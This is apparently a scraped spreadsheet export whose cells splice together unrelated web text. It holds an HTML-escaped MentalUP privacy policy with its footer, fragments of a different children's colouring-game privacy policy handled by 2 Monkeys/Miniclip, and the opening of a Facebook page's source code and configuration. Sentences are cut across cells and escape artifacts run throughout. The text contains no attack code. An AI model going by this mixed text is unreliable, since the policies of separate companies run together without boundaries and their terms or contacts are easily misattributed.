            &lt;p&gt; This Privacy Policy was executed by and between Ayasis Yazılım ve Bilişim Teknolojileri Anonim Şirketi (“&lt;b&gt;the Company&lt;/b&gt;”) located at Yıldız Teknik Üniversitesi Davutpaşa Kampüsü Teknopark D2 Blok No: 1B06 Esenler/Istanbul in its capacity as the “&lt;b&gt;Data Controller&lt;/b&gt;” and all individuals (“&lt;b&gt;Member&lt;/b&gt;”) using MentalUP products/services through &lt;a href="https://www.mentalup.net/"&gt;www.mentalup.net&lt;/a&gt; and &lt;a href="https://www.mentalup.co/"&gt;www.mentalup.co&lt;/a&gt; web sites and MentalUP mobile application (“&lt;b&gt;MentalUP&lt;/b&gt;”) owned and operated by the Company. In this context, the purpose of this Privacy Policy is to provide information on the collection, processing and use of the data provided by you in connection with the use of MentalUP as well as the grade, purpose and scope of transfer thereof.&lt;/p&gt;_x005F_x000D_
_</t>
  </si>
  <si>
    <t>x000D_
            &lt;p&gt;When the Member uses MentalUP; or somehow communicates with MentalUP, MentalUP collects information about the Member in accordance with the nature of the information and transaction within the current technical possibilities. The Member accepts, acknowledges and promises that his / her personal information and data might be used in a limited manner by the Company and/or through MentalUP to the extent that it is limited to the format and purposes set forth in this Privacy Policy.&lt;/p&gt;_x005F_x000D_
_ x000D_
            &lt;p&gt;</t>
  </si>
  <si>
    <t>The Company might collect the Member's personal information (user name, name if provided, IP address, the date and time of access, the pages accessed while being on MentalUP) and the activities taken place under MentalUP in order to provide better service to the Member, to make suggestions, to improve its services, to facilitate the use of MentalUP at the works related to the Member's interests and preferences,  within the framework of legal legislation.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
            &lt;p&gt; The information provided by the Member in order for the Company to communicate with itself as well as the information obtained by the Company via cookies and similar methods during the Member’s activities on MentalUP; might be recorded, stored in printed / magnetic archives, updated whenever necessary, shared, transferred, used and processed by the Company in accordance with the personal data processing requirements and purposes set out in the applicable legislation and also for the Company to provide certain services to you in connection with the use of MentalUP, to fulfill the necessary procedures for payment in the event that the goods and services provided are subject to any fee, to inform regarding the services rendered, to be able to respond to questions, to make sure that the necessary permits are received and taken from parents/legal representatives if the Member is between the ages of 13 and 18, if it is required directly for the execution and performance of a contract between the Company and the Member and for the Company to fulfill its legal obligations and also for the purposes of asserting the relevant rights or establishing the defense in relation to such personal data, limited to the purpose of use, and for a period of time limited with such use. This information shared may be changed and updated by the Member at any time.</t>
  </si>
  <si>
    <t>Data collected through MentalUP may not be used or shared with third parties for purposes unrelated to improving the user experience or software/hardware performance connected to the MentalUP’s functionality.&lt;/p&gt;_x005F_x000D_
_ x000D_
            &lt;p&gt; The data shared by the Member shall not be used directly or indirectly for the benefit of any third party for any reason whatsoever; without the express and explicit written permission of the Member, shall not be shared, partly or completely copied and published with any third party, firm or entity other than for the purposes set forth in this Privacy Policy.</t>
  </si>
  <si>
    <t>Additional authorization from the Member may be required if it is compulsory within the provisions of the relevant legislation or if the data transmitted by the Member must be used for purposes other than those specified in this text. In this case, the Member will be contacted and its explicit consent will be requested. If the Member does not agree, no additional data shall be obtained.&lt;/p&gt;_x005F_x000D_
_</t>
  </si>
  <si>
    <t>x000D_
            &lt;p&gt;If the personal data provided to the Company by the Member is requested by official institutions/organizations as necessitated by the law, the data may be transmitted to the relevant authorities and courts if requested by the courts.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
            &lt;p&gt;It may be required to open an account in order to have access to the services. The member declares that he or she is at least 18 years old (or older) and understands and accepts these conditions in order to open an account on his behalf. If the member is at least 13 years of age and under 18 years of age, and have the power to discriminate, he/she must sign up to MentalUp and must provide his / her data only in the presence of one of his/her parents or his/her legal representative.</t>
  </si>
  <si>
    <t>In this context, the Member declares that his or her parent or legal representative has reviewed and accepted this Privacy Policy and that the data has been shared following the said permission. Neither person under 13 (thirteen) years of age can be directly a member of the MentalUP itself, nor submit his/her own personal data directly.&lt;/p&gt;_x005F_x000D_
_ x000D_
            &lt;p&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">In the event that the internet sites of the Company contain links to other internet sites according to the nature of the situation, the Company shall have no commitment to ensure that the operators of these sites comply with the data protection provisions. The Company shall never be responsible for the content of the sites to which it links with other methods such as links or the like.&lt;/p&gt;_x005F_x000D_
_ x000D_
            &lt;div&gt;_x005F_x000D_
                Within the scope of the data you have provided to the Company, the Member may apply to the Company and be entitled to _x005F_x000D_
                &lt;ul&gt;_x005F_x000D_
                    &lt;li&gt;find out whether personal data is being processed;&lt;/li&gt;_x005F_x000D_
                    &lt;li&gt;request information on personal data, if it has been processed;&lt;/li&gt;_x005F_x000D_
                    &lt;li&gt;find out the purpose of processing his/her personal data and whether they are being used appropriately in line with their purposes;&lt;/li&gt;_x005F_x000D_
                    &lt;li&gt;know the third parties to whom personal data is transmitted in or out of the country;&lt;/li&gt;_x005F_x000D_
                    &lt;li&gt;request that his/her personal data be corrected if it is incomplete or incorrectly processed;&lt;/li&gt;_x005F_x000D_
                    &lt;li&gt;request that personal data be erased or destroyed if the circumstances requiring the processing of the personal data disappearance;&lt;/li&gt;_x005F_x000D_
                    &lt;li&gt;require correction, deletion or destruction to be reported to a third party to whom personal data is transferred;&lt;/li&gt;_x005F_x000D_
                    </t>
  </si>
  <si>
    <t>&lt;li&gt;object to the occurrence of an adverse consequence by analyzing the processed data exclusively through automated systems; and&lt;/li&gt;_x005F_x000D_
                    &lt;li&gt;have the right to claim damages in case of impairment because his/her personal data is processed in violation of the relevant legal legislation.&lt;/li&gt;_x005F_x000D_
                &lt;/ul&gt;_x005F_x000D_
            &lt;/div&gt;_x005F_x000D_
            &lt;p&gt; In the event that a Member submits his/her claims for his/ her rights towards the Company in the manner set forth in the Administrative Privacy Policy, the Company shall conclude the application as soon as possible and in any event not later than 30 (thirty) days in accordance with the nature of the claim. However, if the transaction also requires the assumption of a cost, the fee may be charged at the rate specified by the Personal Data Protection Board.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
            &lt;p&gt;</t>
  </si>
  <si>
    <t>Despite the fact that the processing activity is carried out in accordance with the relevant legislation, the personal data of the Member shall be deleted, destroyed or anonymized in accordance with the related legislation after the end of the processing purposes stated in this Privacy Policy.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
            &lt;p&gt; In order to use the rights notified to the Member in this Privacy Policy, the Member must include the necessary information that can be used by the Company to identify the Member and the description/explanations regarding which right he/she requests to exercise must be delivered to Yıldız Technical University Davutpaşa Campus at Kampüsü Teknopark D2 Blok No:1B06 Esenler/Istanbul by hand or sent through notary or other methods specified in the related legislation or may be sent as signed by secure electronic signature to info@ayasis.com, which is the e-mail address of the Company. The Company accepts the request on the application of the Member or rejects it by explaining the reason and declares the answer to the related person in writing or in electronic form.</t>
  </si>
  <si>
    <t>If the application is accepted, it will be fulfilled by the Company. If the Applicant is attributable to any fault of the Company and a fee is collected from the Member, the remuneration shall be returned to the Member.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
            &lt;p&gt; The Company undertakes to keep the Member's data and any confidential information strictly private and confidential, without prejudice to the contents hereof, to regard it as an obligation to keep confidentiality, to take all measures and act in due diligence to prevent all or any part of the Member's information from entering into the public domain or be subject to unauthorized use, or to take measures to prevent the confidential information from disclosure to any third party.</t>
  </si>
  <si>
    <t>If, despite all necessary data security measures taken by the Company, the confidential information is damaged as a result of attacks on the system or captured by third parties, the Company shall have no responsibility with that respect.&lt;/p&gt;_x005F_x000D_
_ x000D_
            &lt;p&gt; The Company shall not disclose personal data and confidential information of the Member unless (a) it is required to disclose such information in accordance with applicable laws or regulations or a court decision or administrative order issued and/or (b) it is Member's request and/or (c) it is stated within this Privacy Policy or within other agreements executed by and between the Member and the Company.&lt;/p&gt;_x005F_x000D_
_</t>
  </si>
  <si>
    <t>x000D_
            &lt;p&gt; The Company shall not be responsible for damages caused by the use of information that the member discloses in comments made or messages given by third parties in public areas. If the member shares his/her name, password, etc. used by the member when creating the membership record with third parties, the Company shall not be responsible for any damages that may arise from the information shared with third parties.&lt;/p&gt;_x005F_x000D_
_</t>
  </si>
  <si>
    <t>x000D_
            &lt;p&gt; The Company may review the personal information and data of a Member who is in breach of the User Agreement or Privacy Policy or is the subject of complaint by other members.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
            &lt;p&gt; The Company may at any time update, amend, or revoke the provisions of this Privacy Policy.</t>
  </si>
  <si>
    <t>In this case, the Member shall be notified via the services/products or by other means such as e-mail. Any provision that is updated, modified or removed from effect shall enure for the Member at the time of publication. The Member shall be deemed to have accepted such amendment if the Member continues to use the services or products of the Company after such modification has been made.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
        &lt;/div&gt;_x005F_x000D_
    &lt;/section&gt;_x005F_x000D_
_x005F_x000D_
        &lt;a href="#" class="scroll-to-top-btn"&gt;_x005F_x000D_
            &lt;i class="fa fa-angle-up"&gt;&lt;/i&gt;_x005F_x000D_
        &lt;/a&gt;_x005F_x000D_
        &lt;footer class="footer footer-bg-colour"&gt;_x005F_x000D_
            &lt;div class="container"&gt;_x005F_x000D_
                &lt;div class="row"&gt;_x005F_x000D_
                    &lt;div class="col-sm-3 padding-top"&gt;_x005F_x000D_
                        &lt;a href="https://www.mentalup.co/" class="footer-logo-new"&gt;_x005F_x000D_
                            &lt;img src="https://www.mentalup.co/img/mentalup-logo-3.png" alt="mentalup discover your potential" width="200" /&gt;_x005F_x000D_
                        &lt;/a&gt;_x005F_x000D_
                        &lt;div&gt;_x005F_x000D_
                            &lt;div class="widget widget_pages margin-bottom-zero footer-social-box-position"&gt;_x005F_x000D_
                                &lt;a href="https://www.facebook.com/mentalupen"&gt;_x005F_x000D_
                                    &lt;div class="footer-social-box"&gt;_x005F_x000D_
                                        &lt;div class="fa fa-facebook footer-facebook"&gt;&lt;/div&gt;_x005F_x000D_
                                        Facebook_x005F_x000D_
                                    &lt;/div&gt;_x005F_x000D_
                                &lt;/a&gt;_x005F_x000D_
                                &lt;a href="https://twitter.com/mentalupen"&gt;_x005F_x000D_
                                    &lt;div class="footer-social-box"&gt;_x005F_x000D_
                                        &lt;div class="fa fa-twitter footer-twitter"&gt;&lt;/div&gt;_x005F_x000D_
                                        Twitter_x005F_x000D_
                                    &lt;/div&gt;_x005F_x000D_
                                &lt;/a&gt;_x005F_x000D_
                                &lt;a href="https://www.instagram.com/mentalupen/"&gt;_x005F_x000D_
                                    &lt;div class="footer-social-box"&gt;_x005F_x000D_
                                        &lt;div class="fa fa-instagram footer-instagram"&gt;&lt;/div&gt;_x005F_x000D_
                                        Instagram_x005F_x000D_
                                    &lt;/div&gt;_x005F_x000D_
                                &lt;/a&gt;_x005F_x000D_
                                &lt;a href="https://www.youtube.com/channel/UCndhz-yhISYf_eUTlOLJ6Ow"&gt;_x005F_x000D_
                                    &lt;div class="footer-social-box"&gt;_x005F_x000D_
                                        &lt;div class="fa fa-youtube-play footer-youtube"&gt;&lt;/div&gt;_x005F_x000D_
                                        Youtube_x005F_x000D_
                                    &lt;/div&gt;_x005F_x000D_
                                &lt;/a&gt;_x005F_x000D_
                                &lt;a href="https://tr.pinterest.com/mentalupen/"&gt;_x005F_x000D_
                                    &lt;div class="footer-social-box"&gt;_x005F_x000D_
                                        &lt;div class="fa fa-pinterest footer-pinterest"&gt;&lt;/div&gt;_x005F_x000D_
                                        Pinterest_x005F_x000D_
                                    &lt;/div&gt;_x005F_x000D_
                                &lt;/a&gt;_x005F_x000D_
                            &lt;/div&gt;_x005F_x000D_
                        &lt;/div&gt;_x005F_x000D_
                    &lt;/div&gt;_x005F_x000D_
                    &lt;div class="col-sm-4 padding-top-2x"&gt;_x005F_x000D_
                        &lt;div class="widget widget_pages"&gt;_x005F_x000D_
                            &lt;h3 class="widget-title color-orange"&gt;New Articles&lt;/h3&gt;_x005F_x000D_
                            &lt;ul&gt;_x005F_x000D_
                                &lt;li&gt;&lt;a href="https://www.mentalup.co/blog/8th-grade-math-games"&gt;8th Grade Math Games: Practice Online Games and Download Printable Activities&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
                                &lt;li&gt;&lt;a href="https://www.mentalup.co/blog/7th-grade-math-games"&gt;7th Grade Math Games: Play Online Games &amp; Download Printable Worksheets&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
                                &lt;li&gt;&lt;a href="https://www.mentalup.co/blog/6th-grade-math-games"&gt;6th Grade Math Games:</t>
  </si>
  <si>
    <t>Play Ratio, Math Basketball and More for Ages 11+&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
                                &lt;li&gt;&lt;a href="https://www.mentalup.co/blog/5th-grade-math-games"&gt;5th Grade Math Games: Play Fractions, Decimals, and more Games Free Online&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
                            &lt;/ul&gt;_x005F_x000D_
                        &lt;/div&gt;_x005F_x000D_
                    &lt;/div&gt;_x005F_x000D_
                    &lt;div class="col-sm-2 padding-top-2x"&gt;_x005F_x000D_
                        &lt;div class="widget widget_pages"&gt;_x005F_x000D_
                            &lt;h3 class="widget-title color-orange"&gt;Useful Links&lt;/h3&gt;_x005F_x000D_
                            &lt;ul&gt;_x005F_x000D_
                                &lt;li&gt;&lt;a href="https://www.mentalup.co/about-us"&gt;About Us&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
                                &lt;li&gt;&lt;a href="https://www.mentalup.co/contact-us"&gt;Contact Us&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
                                &lt;li&gt;&lt;a href="https://www.mentalup.co/user-comments"&gt;User Comments&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
                                &lt;li&gt;&lt;a href="https://www.mentalup.co/agreements"&gt;User Agreements&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
                                &lt;li&gt;&lt;a href="https://www.mentalup.co/in-the-news"&gt;In the News&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
                                &lt;li&gt;&lt;a href="https://www.mentalup.co/media-resources"&gt;Media</t>
  </si>
  <si>
    <t xml:space="preserve">Resources&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
                            &lt;/ul&gt;_x005F_x000D_
                        &lt;/div&gt;_x005F_x000D_
                    &lt;/div&gt;_x005F_x000D_
                    &lt;div class="col-sm-2 padding-top-2x"&gt;_x005F_x000D_
                        &lt;div class="widget widget_pages"&gt;_x005F_x000D_
                            &lt;h3 class="widget-title color-orange"&gt;Quick Access&lt;/h3&gt;_x005F_x000D_
                             &lt;ul&gt;_x005F_x000D_
                                &lt;li&gt;&lt;a href="https://www.mentalup.co/blog/"&gt;MentalUP Blog&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
                                &lt;li&gt;&lt;a href="https://www.mentalup.co/faq/personal"&gt;Help &amp; Support Center&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
                                &lt;li&gt;&lt;a href="https://www.mentalup.co/site-map"&gt;Sitemap&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
                                &lt;li&gt;&lt;a href="https://www.mentalup.co/brain-games"&gt;Brain Games&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
                                &lt;li&gt;&lt;a href="https://www.mentalup.co/concentration-games"&gt;Concentration Games&lt;/a&gt;&lt;/li&gt;_x005F_x000D_
                            &lt;/ul&gt;_x005F_x000D_
                        &lt;/div&gt;_x005F_x000D_
                    &lt;/div&gt;_x005F_x000D_
                &lt;/div&gt;_x005F_x000D_
                &lt;div class="row"&gt;_x005F_x000D_
                    &lt;div class="col-md-12 text-center"&gt;_x005F_x000D_
                        &lt;div class="copyright"&gt;_x005F_x000D_
                            &lt;p&gt;&amp;copy; All rights reserved - MentalUP&lt;/p&gt;_x005F_x000D_
                        &lt;/div&gt;_x005F_x000D_
                    &lt;/div&gt;_x005F_x000D_
                &lt;/div&gt;_x005F_x000D_
            &lt;/div&gt;_x005F_x000D_
        &lt;/footer&gt;_x005F_x000D_
    &lt;/div&gt;_x005F_x000D_
&lt;/body&gt;_x005F_x000D_
&lt;/html&gt;_x005F_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">If you have any questions about our data practices, your rights or have any concerns or complaints, you can contact us at &lt;a href="/cdn-cgi/l/email-protection#5a33343c351a6877373534313f2329743436"&gt;&lt;span class="__cf_email__" data-cfemail="7f161119103f4d52121011141a060c511113"&gt;[email&amp;#160;protected]&lt;/span&gt;&lt;/a&gt;, or send a letter to the address provided in the &lt;a href="#adress"&gt; Privacy Policy &lt;/a&gt;. We will respond within 1 month.&lt;/p&gt;
&lt;/br&gt;
&lt;p&gt;
 Our games include but are not limited to:
&lt;br&gt;&lt;br&gt;
 - Cars  (com.color.cars)&lt;/br&gt;
 - Christmas Coloring  (com.coloring.christmas)&lt;/br&gt;
 - Coloring Book: ColorMaster  (com.coloring.book)&lt;/br&gt;
 - Coloring book  (com.coloring.kids)&lt;/br&gt;
 - Coloring for girls and women  (com.coloring.girls)&lt;/br&gt;
 - Dino Coloring Game  (com.coloring.dinosaur)&lt;/br&gt;
 - Dolphins coloring pages  (com.coloring.fishdolphins)&lt;/br&gt;
 - Football coloring book game  (com.coloring.football)&lt;/br&gt;
 - Halloween  (com.coloring.halloween)&lt;/br&gt;
 - Horse coloring pages game  (com.coloring.horse)&lt;/br&gt;
 - Jigsaw Puzzle Game  (com.puzzlemaster.jigsaw)&lt;/br&gt;
 - Mandala Coloring Pages  (com.color.mandala)&lt;/br&gt;
 - Manga Coloring Book  (com.coloring.manga)&lt;/br&gt;
 - Mermaids  (com.coloring.mermaids)&lt;/br&gt;
 - Painting and drawing for Girls  (com.coloring.girlsfree)&lt;/br&gt;
 - Painting and drawing game  (com.coloring.toddlers)&lt;/br&gt;
 - Princess Coloring Game  (com.princess.coloring)&lt;/br&gt;
 - Train game: coloring book.  </t>
  </si>
  <si>
    <t>We will only collect data, in these apps when it is needed to provide the service and ensure that they are protected in accordance with the applicable privacy laws. &lt;br /&gt; &lt;br /&gt; If you are a parent or legal guardian of a child under the age of 13 (or under 16 in certain jurisdictions in the European Union) who uses a child directed Game, please contact us at &lt;a href="/cdn-cgi/l/email-protection#0861666e67483a25456766636d717b266664"&gt;&lt;span class="__cf_email__" data-cfemail="21484f474e61130c6c4e4f4a4458520f4f4d"&gt;[email&amp;#160;protected]&lt;/span&gt;&lt;/a&gt;, if you have any questions or comments.</t>
  </si>
  <si>
    <t>For Brazilian residents, please &lt;a href="#brazil"&gt; refer to Addendum 2 - Brazil Privacy Rights &lt;/a&gt; . For EEA and Switzerland based, you will find more information below on when which rights can apply.&lt;/p&gt;
&lt;p&gt;To exercise your rights, please email us at &lt;u&gt; &lt;a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="84edeae2ebc4b6a9c9ebeaefe1fdf7aaeae8"&gt;[email&amp;#160;protected]&lt;/a&gt;&lt;/u&gt;.&lt;/p&gt;
&lt;/div&gt;
&lt;div&gt;
&lt;ul type="disc"&gt;
&lt;li&gt;&lt;strong&gt;Access&lt;/strong&gt; . You have the right to access Information, and to receive an explanation of how we use it and who we share it with.</t>
  </si>
  <si>
    <t>CONTACT &amp;amp; COMPLAINTS&lt;/h3&gt;
&lt;p&gt;We welcome questions, comments and requests regarding this Policy. These should be addressed to &lt;a href="/cdn-cgi/l/email-protection#20494e464f60120d6d4f4e4b4559530e4e4c"&gt;&lt;span class="__cf_email__" data-cfemail="fd94939b92bdcfd0b092939698848ed39391"&gt;[email&amp;#160;protected]&lt;/span&gt;&lt;/a&gt;. You can also send a letter to 2 Monkeys Data Protection c/o Miniclip SA, Faubourg de l'H&amp;ocirc;pital 18, 2000 Neuch&amp;acirc;tel, Switzerland.</t>
  </si>
  <si>
    <t>Alternatively, if you are based in the EEA, you can send a letter to 2Monkeys Data protection c/o Miniclip (UK) Limited at Legal Department at Miniclip, Holborn Gate, 326-330 High Holborn, London WC1V 7PP.&lt;/p&gt;
&lt;p&gt;If you wish to make a complaint about how we process your Information, please contact us at &lt;a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="2940474f46691b04644647424c505a074745"&gt;[email&amp;#160;protected]&lt;/a&gt; and we will endeavour to deal with your complaint as soon as possible. This is without prejudice to your right to launch a claim with a data protection authority.&lt;/p&gt;
&lt;p&gt;&amp;nbsp;&lt;/p&gt;
&lt;h3&gt;8. CHANGES&lt;/h3&gt;
&lt;p&gt;Any updates or changes to this Policy will be published here.</t>
  </si>
  <si>
    <t>&lt;!DOCTYPE html&gt;
&lt;html lang="en" id="facebook" class="no_js"&gt;
&lt;head&gt;&lt;meta charset="utf-8" /&gt;&lt;meta name="referrer" content="default" id="meta_referrer" /&gt;&lt;script nonce="LUvh1ADT"&gt;function envFlush(a){function b(b){for(var c in a)b[c]=a[c]}window.requireLazy?window.requireLazy(["Env"],b):(window. Env=window. Env||{},b(window.Env))}envFlush({"useTrustedTypes":false,"isTrustedTypesReportOnly":false,"ajaxpipe_token":"AXiaLrIhMeDjpxXY7r4","gk_instrument_object_url":true,"stack_trace_limit":30,"timesliceBufferSize":5000,"show_invariant_decoder":false,"compat_iframe_token":"AQ5_Wi-YcXi5WL46RKI","isCQuick":false});&lt;/script&gt;&lt;script nonce="LUvh1ADT"&gt;(function(a){function b(b){if(!window.openDatabase)return;b.I_AM_INCOGNITO_AND_I_REALLY_NEED_WEBSQL</t>
  </si>
  <si>
    <t>rel="shortcut icon" href="https://static.xx.fbcdn.net/rsrc.php/yv/r/B8BxsscfVBr.ico" /&gt;&lt;link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/y9/l/0,cross/TBFGrVEaXkC.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="zhEt7x8" /&gt;
&lt;link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/yV/l/0,cross/KxGJ10xTR_J.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="Pud6B2Z" /&gt;
&lt;link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/ye/l/0,cross/jgo7iorb2rv.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="MAkAH68" /&gt;
&lt;link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/y0/l/0,cross/JHP4YraMfw4.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="R84VQLw" /&gt;
&lt;link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/yi/l/0,cross/yotEdcUw9Gj.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="DcLQ9Pg" /&gt;
&lt;link type="text/css" rel="stylesheet" href="https://static.xx.fbcdn.net/rsrc.php/v3/yq/l/0,cross/x0_3bRNiego.css?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="1g427HC" /&gt;
&lt;script src="https://static.xx.fbcdn.net/rsrc.php/v3/ys/r/xon46RuP4al.js?_nc_x=Ij3Wp8lg5Kz" data-bootloader-hash="xiNwIjT" nonce="LUvh1ADT"&gt;&lt;/script&gt;
&lt;script nonce="LUvh1ADT"&gt;requireLazy(["HasteSupportData"],function(m){m.handle({"clpData":{"1814852":{"r":1},"1838142":{"r":1,"s":1},"1949898":{"r":1},"1848815":{"r":10000,"s":1}},"gkxData":{"676837":{"result":false,"hash":"AT4N8wBZA8ctCdHwdo0"},"708253":{"result":false,"hash":"AT5n4hBL3YTMnQWtH1w"},"996940":{"result":false,"hash":"AT7opYuEGy3sjG1a-8w"},"1224637":{"result":false,"hash":"AT7JRluWxuwDm3XzCzU"},"1263340":{"result":false,"hash":"AT5bwizWgDaFQudmYBY"},"1073500":{"result":false,"hash":"AT7aJmfnqWyioxOO_m8"},"1167394":{"result":false,"hash":"AT7BpN-tlUPwbIIFXSg"},"3579":{"result":true,"hash":"AT4GLroqi1faSYwdRm4"},"4435":{"result":true,"hash":"AT7J_frtMJbbiuSsl6o"},"1857581":{"result":false,"hash":"AT5yTxGMp6le0PAtq80"}}})});requireLazy(["TimeSliceImpl","ServerJS"],function(TimeSlice,ServerJS){(new ServerJS()).handle({"define":[["URLFragmentPreludeConfig",[],{"hashtagRedirect":true,"fragBlacklist":["nonce","access_token","oauth_token","xs","checkpoint_data","code"]},137],["CometPersistQueryParams",[],{"relative":{},"domain":{}},6231],["CookieDomain",[],{"domain":"facebook.com"},6421],["CurrentAdAccountInitialData",[],{"AD_ACCOUNT_ID":null},6828],["BootloaderConfig",[],{"deferBootloads":false,"jsRetries":[200,500],"jsRetryAbortNum":2,"jsRetryAbortTime":5,"silentDups":false,"hypStep4":false,"phdOn":false,"btCutoffIndex":2412,"fastPathForAlreadyRequired":false,"translationRetries":[200,500],"translationRetryAbortNum":3,"translationRetryAbortTime":50},329],["CSSLoaderConfig",[],{"timeout":5000,"modulePrefix":"BLCSS:","forcePollForBootloader":true},619],["CookieCoreConfig",[],{"c_user":{},"cppo":{"t":86400},"dpr":{"t":604800},"fbl_ci":{"t":31536000},"fbl_cs":{"t":31536000},"fbl_st":{"t":31536000},"i_user":{},"locale":{"t":604800},"m_ls":{"t":158284800},"m_pixel_ratio":{"t":604800},"noscript":{},"presence":{"t":2592000},"sfau":{},"usida":{},"vpd":{"t":5184000},"wd":{"t":604800},"wl_cbv":{"t":7776000},"x-referer":{},"x-src":{"t":1}},2104],["CurrentCommunityInitialData",[],{},490],["CurrentEnvironment",[],{"facebookdotcom":true,"messengerdotcom":false,"workplacedotcom":false,"instagramdotcom":false,"workdotmetadotcom":false},827],["CurrentUserInitialData",[],{"ACCOUNT_ID":"0","USER_ID":"0","NAME":"","SHORT_NAME":null,"IS_BUSINESS_PERSON_ACCOUNT":false,"HAS_SECONDARY_BUSINESS_PERSON":false,"IS_FACEBOOK_WORK_ACCOUNT":false,"IS_MESSENGER_ONLY_USER":false,"IS_DEACTIVATED_ALLOWED_ON_MESSENGER":false,"IS_MESSENGER_CALL_GUEST_USER":false,"IS_WORK_MESSENGER_CALL_GUEST_USER":false,"IS_WORKROOMS_USER":false,"APP_ID":"256281040558","IS_BUSINESS_DOMAIN":false},270],["DTSGInitialData",[],{},258],["ISB",[],{},330],["LSD",[],{"token":"AVoC6c33k8o"},323],["ServerNonce",[],{"ServerNonce":"DpCzd-XCI1CQLFqWAIJQi9"},141],["SiteData",[],{"server_revision":1007297696,"client_revision":1007297696,"tier":"","push_phase":"C3","pkg_cohort":"BP:DEFAULT","haste_session":"19459.BP: DEFAULT.2.0..0.0","pr":1,"haste_site":"www","manifest_base_uri":"https:\/\/static.xx.fbcdn.net","manifest_origin":null,"manifest_version_prefix":null,"be_one_ahead":false,"is_rtl":false,"is_comet":false,"is_experimental_tier":false,"is_jit_warmed_up":true,"hsi":"7221301460376115649","semr_host_bucket":"6","bl_hash_version":2,"skip_rd_bl":true,"comet_env":0,"wbloks_env":false,"spin":4,"__spin_r":1007297696,"__spin_b":"trunk","__spin_t":1681340267,"vip":"157.240.254.35"},317],["SprinkleConfig",[],{"param_name":"jazoest","version":2,"should_randomize":false},2111],["UserAgentData",[],{"browserArchitecture":"32","browserFullVersion":null,"browserMinorVersion":null,"browserName":"Unknown","browserVersion":null,"deviceName":"Unknown","engineName":"Unknown","engineVersion":null,"platformArchitecture":"32","platformName":"Unknown","platformVersion":null,"platformFullVersion":null},527],["PromiseUsePolyfillSetImmediateGK",[],{"www_always_use_polyfill_setimmediate":false},2190],["KSConfig",[],{"killed":{"__set":["MLHUB_FLOW_AUTOREFRESH_SEARCH","NEKO_DISABLE_CREATE_FOR_SAP","EO_DISABLE_SYSTEM_SERIAL_NUMBER_FREE_TYPING_IN_CPE_NON_CLIENT","MOBILITY_KILL_OLD_VISIBILITY_POSITION_SETTING","WORKPLACE_DISPLAY_TEXT_EVIDENCE_REPORTING","BUSINESS_INVITE_FLOW_WITH_SELLER_PROFILE","BUY_AT_UI_LINE_DELETE","BUSINESS_GRAPH_SETTING_APP_ASSIGNED_USERS_NEW_API","BUSINESS_GRAPH_SETTING_BU_ASSIGNED_USERS_NEW_API","BUSINESS_GRAPH_SETTING_ESG_ASSIGNED_USERS_NEW_API","BUSINESS_GRAPH_SETTING_PRODUCT_CATALOG_ASSIGNED_USERS_NEW_API","BUSINESS_GRAPH_SETTING_SESG_ASSIGNED_USERS_NEW_API","BUSINESS_GRAPH_SETTING_WABA_ASSIGNED_USERS_NEW_API","ADS_PLACEMENT_FIX_PUBLISHER_PLATFORMS_MUTATION","FORCE_FETCH_BOOSTED_COMPONENT_AFTER_ADS_CREATION","VIDEO_DIMENSIONS_FROM_PLAYER_IN_UPLOAD_DIALOG","SNIVY_GROUP_BY_EVENT_TRACE_ID_AND_NAME","ADS_STORE_VISITS_METRICS_DEPRECATION","AD_DRAFT_ENABLE_SYNCRHONOUS_FRAGMENT_VALIDATION","SEPARATE_MESSAGING_COMACTIVITY_PAGE_PERMS","LAB_NET_NEW_UI_RELEASE","POCKET_MONSTERS_CREATE","POCKET_MONSTERS_DELETE","WORKPLACE_PLATFORM_SECURE_APPS_MAILBOXES","POCKET_MONSTERS_UPDATE_NAME","IC_DISABLE_MERGE_TOOL_FEED_CHECK_FOR_REPLACE_SCHEDULE","ADS_EPD_IMPACTED_ADVERTISER_MIGRATE_XCONTROLLER","RECRUITING_CANDIDATE_PORTAL_ACCOUNT_DELETION_CARD","BIZ_INBOX_POP_UP_TIP_NAVIGATION_BUG_FIX","SRT_REVIEW_DISABLE_FELLOWSHIP_REVIEW","EO_STORE_HOME_PAGE_COVID19_BANNER"]},"ko":{"__set":["3OsLvnSHNTt","1G7wJ6bJt9K","9NpkGYwzrPG","3oh5Mw86USj","8NAceEy9JZo","7FOIzos6XJX","rf8JEPGgOi","4j36SVzvP3w","4NSq3ZC4ScE","53gCxKq281G","3yzzwBY7Npj","1onzIv0jH6H","8PlKuowafe8","1ntjZ2zgf03","4SIH2GRVX5W","2dh